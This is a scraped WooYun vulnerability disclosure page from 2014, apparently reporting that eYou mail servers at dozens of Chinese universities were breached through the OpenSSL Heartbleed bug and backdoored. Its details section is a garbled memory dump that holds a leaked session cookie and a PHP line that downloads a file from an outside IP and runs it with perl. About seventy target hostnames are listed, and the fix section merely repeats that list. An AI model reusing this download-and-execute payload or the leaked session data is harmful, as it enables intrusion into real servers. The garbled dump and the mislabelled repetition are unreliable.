亿中邮邮件系统大量被入侵安装后门 | wooyun-2014-056812| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-056812

漏洞标题：亿中邮邮件系统大量被入侵安装后门

漏洞作者： w5r2

提交时间：2014-04-12 16:09

修复时间：2014-05-27 16:10

公开时间：2014-05-27 16:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-04-12：细节已通知厂商并且等待厂商处理中
2014-04-15：厂商已经确认，细节仅向厂商公开
2014-04-25：细节向核心白帽子及相关领域专家公开
2014-05-05：细节向普通白帽子公开
2014-05-15：细节向实习白帽子公开
2014-05-27：细节向公众公开

简要描述：

最近爆发的openssl漏洞。导致一些人进入系统安装木马，详细看说明，在下面。

详细说明：

@SC[r+H9w3f"!98532ED/AI42##mail.cuit.edu.cn42it.edu.cnEjtJl%L3A]*.-SfQ7,s1^l1dnt15R;dnt1Fp[.0cookie9emLoginUser=lliu1980; EMPHPSID=cae94rrn3jjorbe1g89m8grht1dnt1`~6&kM\t:) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25Content-Type: application/x-www-form-urlencodedContent-Length: 77

Connection: close<?php system("wget http://94.23.204.157/lol.c -O /tmp/shz;perl /tmp/shz");

?>bfn{fgb`9vyKQ|<R5HdL?;zTb3,8eK_tpl_id\"><\/span>\n <\/td>\n <\/tr-->\n <tr>\n <th width=\"25%\">\u662f\u5426\u5f00\u542f\u81ea\u52a8\u56de\u590d:<\/th>\n <td>\n <input type=\"radio\" name=\"reply_is_opened\" value=\"1\" id=\"reply_is_opened1_eyou_tpl_id\" \/> \u662f \n   \n <input type=\"radio\" name=\"reply_is_opened\" value=\"0\" id=\"reply_is_opened0_eyou_tpl_id\"\/> \u5426 \n <font color=\"red\"><span id=\"reply_extra_fail_eyou_tpl_id\"><\/span><\/font>\n <\/td>\n <\/tr>\n <tr>\n <th width=\"25%\">\u81ea\u52a8\u56de\u590d\u7684\u8303\u56f4:<\/th>\n <td>\n <input type=\"radio\" name=\"reply_scope\" value=\"0\" id=\"reply_scope0_eyou_tpl_id\" \/> \u5168\u90e8\u5730\u5740\u90fd\u56de\u590d \n      \n       \n <input type=\"radio\" name=\"reply_scope\" value=\"3\" id=\"reply_scope3_eyou_tpl_id\"\/> \u53ea\u56de\u590d\u901a\u8baf\u5f55\u4e2d\u7684\u5730\u5740\n <br \/>\n <input type=\"radio\" name=\"reply_scope\" value=\"1\" id=\"reply_scope1_eyou_tpl_id\"\/> \u4e0d\u56de\u590d\u9ed1\u540d\u5355\u4e2d\u7684\u5730\u5740 \n    \n <input type=\"radio\" name=\"reply_scope\" value=\"2\" id=\"reply_scope2_eyou_tpl_id\"\/> \u53ea\u56de\u590d\u767d\u540d\u5355\u4e2d\u7684\u5730\u5740\n \n \n <font color=\"red\"><span id=\"reply_scope_f`A6K:K: ngix/1:+:;:]Tranpg: cp &)+/4:@OZnW "#$$$$&'(()+,,./0017:=>@@@@ADEHHJNPQTVX]_`bblnsy{~&8KY~)^[ 2R879\u8bbe\u7f6e\u53ef\u4ee5\u6539\u53d8\u6240\u56de\u590d\u7684\u4fe1\u4ef6\u4e2d\u5305\u542b\u539f\u6587\u7684\u957f\u77ed\u3002<\/p>\n

漏洞证明：

下面列举一些站点。打包一下。

mail.sues.edu.cn
mail.hpu.edu.cn
mail.bnuz.edu.cn
mail.hqu.edu.cn
mail.bjtu.edu.cn
mail.tjut.edu.cn
mail.ccut.edu.cn
mail.cuit.edu.cn
mail.ntu.edu.cn
mail.haust.edu.cn
mail.qdu.edu.cn
mail.shupl.edu.cn
mail.btbu.edu.cn
mail.shmtu.edu.cn
mail.qhnu.edu.cn
mail.scau.edu.cn
mail.lyu.edu.cn
mail.cug.edu.cn
mail.bigc.edu.cn
mail.xmut.edu.cn
mail.dlnu.edu.cn
mail.jssvc.edu.cn
mail.xisu.edu.cn
mail.jstu.edu.cn
mail.xbmu.edu.cn
mail.xtu.edu.cn
mail.nau.edu.cn
mail.lit.edu.cn
mail.hubu.edu.cn
mail.ybu.edu.cn
mail.tust.edu.cn
mail.hainnu.edu.cn
mail.lntu.edu.cn
mail.zjc.zjut.edu.cn
mail.njnu.edu.cn
mail.just.edu.cn
mail.snut.edu.cn
mail.njtu.edu.cn
mail.usc.edu.cn
mail.hist.edu.cn
mail.whpu.edu.cn
mail.haut.edu.cn
mail.sust.edu.cn
mail.sqnc.edu.cn
mail.hunau.edu.cn
mail.jcut.edu.cn
mail.tyut.edu.cn
mail.tjuci.edu.cn
mail.dzu.edu.cn
mail.cmc.edu.cn
mail.hunnu.edu.cn
mail.tsmc.edu.cn
mail.utibet.edu.cn
mail.jnxy.edu.cn
mail.jliae.edu.cn
mail.sei.pku.edu.cn
mail.tjutcm.edu.cn
mail.shec.edu.cn
mail.gzccc.edu.cn
mail.jxau.edu.cn
mail.guat.edu.cn
mail.hbpu.edu.cn
mail.wtu.edu.cn
mail.hiu.edu.cn
mail.glcat.edu.cn
mail.huat.edu.cn
mail.dlu.edu.cn
mail.hitsz.edu.cn
mail.sdca.edu.cn
mail.zknu.edu.cn
mail.cczu.edu.cn
mail.swfu.edu.cn
mail.ndnu.edu.cn

修复方案：

下面列举一些站点。打包一下。

mail.sues.edu.cn
mail.hpu.edu.cn
mail.bnuz.edu.cn
mail.hqu.edu.cn
mail.bjtu.edu.cn
mail.tjut.edu.cn
mail.ccut.edu.cn
mail.cuit.edu.cn
mail.ntu.edu.cn
mail.haust.edu.cn
mail.qdu.edu.cn
mail.shupl.edu.cn
mail.btbu.edu.cn
mail.shmtu.edu.cn
mail.qhnu.edu.cn
mail.scau.edu.cn
mail.lyu.edu.cn
mail.cug.edu.cn
mail.bigc.edu.cn
mail.xmut.edu.cn
mail.dlnu.edu.cn
mail.jssvc.edu.cn
mail.xisu.edu.cn
mail.jstu.edu.cn
mail.xbmu.edu.cn
mail.xtu.edu.cn
mail.nau.edu.cn
mail.lit.edu.cn
mail.hubu.edu.cn
mail.ybu.edu.cn
mail.tust.edu.cn
mail.hainnu.edu.cn
mail.lntu.edu.cn
mail.zjc.zjut.edu.cn
mail.njnu.edu.cn
mail.just.edu.cn
mail.snut.edu.cn
mail.njtu.edu.cn
mail.usc.edu.cn
mail.hist.edu.cn
mail.whpu.edu.cn
mail.haut.edu.cn
mail.sust.edu.cn
mail.sqnc.edu.cn
mail.hunau.edu.cn
mail.jcut.edu.cn
mail.tyut.edu.cn
mail.tjuci.edu.cn
mail.dzu.edu.cn
mail.cmc.edu.cn
mail.hunnu.edu.cn
mail.tsmc.edu.cn
mail.utibet.edu.cn
mail.jnxy.edu.cn
mail.jliae.edu.cn
mail.sei.pku.edu.cn
mail.tjutcm.edu.cn
mail.shec.edu.cn
mail.gzccc.edu.cn
mail.jxau.edu.cn
mail.guat.edu.cn
mail.hbpu.edu.cn
mail.wtu.edu.cn
mail.hiu.edu.cn
mail.glcat.edu.cn
mail.huat.edu.cn
mail.dlu.edu.cn
mail.hitsz.edu.cn
mail.sdca.edu.cn
mail.zknu.edu.cn
mail.cczu.edu.cn
mail.swfu.edu.cn
mail.ndnu.edu.cn

版权声明：转载请注明来源 w5r2@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-04-15 10:52

厂商回复：

确实与我公司使用的OpenSSL有关，已为用户提供解决方案，多谢提供！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-056812

漏洞标题：亿中邮邮件系统大量被入侵安装后门

相关厂商：北京亿中邮信息技术有限公司

漏洞作者： w5r2

提交时间：2014-04-12 16:09

修复时间：2014-05-27 16:10

公开时间：2014-05-27 16:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 w5r2@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-056812

漏洞标题：亿中邮邮件系统大量被入侵安装后门

相关厂商：北京亿中邮信息技术有限公司

漏洞作者： w5r2

提交时间：2014-04-12 16:09

修复时间：2014-05-27 16:10

公开时间：2014-05-27 16:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-056812"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 w5r2@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：